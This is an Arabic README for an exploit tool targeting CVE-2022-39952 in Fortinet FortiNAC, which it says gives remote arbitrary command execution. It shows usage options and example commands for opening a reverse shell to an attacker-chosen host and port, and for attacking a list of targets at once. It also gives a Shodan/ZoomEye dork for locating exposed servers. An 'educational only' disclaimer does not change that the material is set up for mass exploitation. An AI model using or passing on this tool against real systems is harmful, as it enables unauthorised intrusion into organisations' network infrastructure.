
إثبات المفهوم لـ CVE-2022-39952 الذي يؤثر على Fortinet FortiNAC.
هذا الاستغلال يسمح للمهاجم بتنفيذ أوامر عشوائية على خادم FortiNAC. يعتمد على PoC المطور من قبل horizon3ai، مع خيارات إضافية لاستهداف عدة مضيفين.
تنويه: هذا الاستغلال لأغراض تعليمية فقط. يُرجى استخدامه بمسؤولية وبإذن.
usage: exploit.py [-h] [-t TARGET] [-l LIST] [-lh LHOST] [-lp LPORT]
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
The IP address of the target
-l LIST, --list LIST List of targets
-lh LHOST, --lhost LHOST
The local host for the reverse shell
-lp LPORT, --lport LPORT
The local port for the reverse shell
لاستخدام هذا الاستغلال، يجب أن يكون لديك Python 3.x مثبتاً على نظامك.
Python 3.x
requests module
concurrent.futures module
$ python exploit.py -t 192.168.1.100 -lh 192.168.1.10 -lp 4444
$ python exploit.py -t 192.168.1.100
$ python exploit.py -l targets.txt
تم اختبار هذا الاستغلال على عدد محدود من الأهداف فقط، لذا قد تختلف فعاليته. الدُورك (dork) للعثور على الأهداف المحتملة على ZoomEye و Shodan هو:
title:"FortiNAC" +"JSESSIONID"